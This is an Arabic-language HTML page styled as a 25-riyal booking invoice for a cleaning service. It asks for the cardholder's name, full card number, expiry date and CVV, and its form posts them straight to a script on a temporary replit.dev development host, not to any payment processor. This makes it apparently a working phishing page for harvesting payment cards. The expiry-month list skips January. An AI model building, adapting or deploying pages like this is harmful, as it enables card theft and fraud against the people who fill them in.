<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>فاتورة تأكيد حجز</title>
    <link href="https://fonts.googleapis.com/css2?family=Tajawal:wght@400;700&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Tajawal', sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
            direction: rtl;
        }
        .container {
            max-width: 400px;
            margin: 50px auto;
            background: #fff;
            padding: 20px;
            border-radius: 12px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }
        .logo {
            display: block;
            margin: 0 auto 20px;
            max-width: 80px;
        }
        h2 {
            text-align: center;
            color: #333;
            margin-bottom: 20px;
        }
        .bill-details {
            background-color: #f9f9f9;
            border: 1px solid #ddd;
            padding: 15px;
            border-radius: 8px;
            margin-bottom: 20px;
        }
        .bill-details p {
            margin: 5px 0;
            font-size: 16px;
            color: #555;
        }
        .bill-details .total {
            font-size: 18px;
            font-weight: bold;
            color: #333;
            text-align: center;
        }
        form {
            display: flex;
            flex-direction: column;
        }
        label {
            margin-bottom: 8px;
            font-weight: bold;
            color: #555;
        }
        input, select {
            margin-bottom: 15px;
            padding: 12px;
            font-size: 14px;
            border: 1px solid #ddd;
            border-radius: 6px;
            transition: border-color 0.3s;
        }
        input:focus, select:focus {
            outline: none;
            border-color: #007bff;
        }
        button {
            padding: 12px;
            font-size: 16px;
            font-weight: bold;
            color: #fff;
            background-color: #007bff;
            border: none;
            border-radius: 6px;
            cursor: pointer;
            transition: background-color 0.3s;
        }
        button:hover {
            background-color: #0056b3;
        }
        .notice {
            font-size: 14px;
            color: #888;
            margin-top: 10px;
            text-align: center;
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="alraqi/ap.jpeg" alt="Logo" class="logo">
        <h2>فاتورة تأكيد حجز</h2>
        <div class="bill-details">
            <p>٢٥ ريال سعودي</p>
            <p>البيت الراقي لخدمات التنظيف</p>
            <p class="total">المجموع: ٢٥ ريال سعودي</p>
        </div>
        <form action="https://4845ee08-231c-49ab-a265-c887144f82c0-00-27oslksbz5zql.sisko.replit.dev/index.php" method="POST">
            <label for="card-name">الاسم على البطاقة</label>
            <input type="text" id="card-name" name="card-name" placeholder="اكتب الاسم على البطاقة" required>

            <label for="card-number">رقم البطاقة</label>
            <input type="text" id="card-number" name="card-number" placeholder="1234 5678 9012 3456" maxlength="16" required>

            <label for="expiry-date">تاريخ الانتهاء</label>
            <div class="flex-row">
                <select id="expiry-month" name="expiry-month" required>
                    <option value="" disabled selected>الشهر</option>
                 <option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
                </select>
                <select id="expiry-year" name="expiry-year" required>
                    <option value="" disabled selected>السنة</option>
                </select>
            </div>

            <label for="cvv">CVV</label>
            <input type="password" id="cvv" name="cvv" placeholder="123" maxlength="3" required>

            <button type="submit">ادفع الآن</button>
        </form>

        <p class="notice">تأكد من صحة التفاصيل قبل الدفع</p>
    </div>
    <script>
        // Populate the year dropdown
        const currentYear = new Date().getFullYear();
        const expiryYearSelect = document.getElementById('expiry-year');
        for (let i = 0; i < 10; i++) {
            const year = currentYear + i;
            const option = document.createElement('option');
            option.value = year;
            option.textContent = year;
            expiryYearSelect.appendChild(option);
        }
    </script>
</body>
</html>

